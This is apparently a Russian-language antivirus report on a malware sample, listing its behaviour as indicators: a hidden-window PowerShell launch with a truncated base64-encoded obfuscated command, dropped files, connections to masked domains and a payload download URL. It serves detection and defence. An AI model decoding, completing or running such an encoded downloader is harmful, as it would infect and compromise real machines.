Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 852
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\921279.cvr
- 'bh####raexpress.com':443
- 'za###ajouk.com':80
- 'za###ajouk.com':443
- 'e2####lution.com':443
- http://za###ajouk.com/cf9r4nd/Xsma350581/
- 'bh####raexpress.com':443
- 'za###ajouk.com':443
- 'e2####lution.com':443
- DNS ASK fi#####rcleanerstx.com
- DNS ASK bh####raexpress.com
- DNS ASK cr#.###ayanpharma.com
- DNS ASK za###ajouk.com
- DNS ASK e2####lution.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH... (со скрытым окном)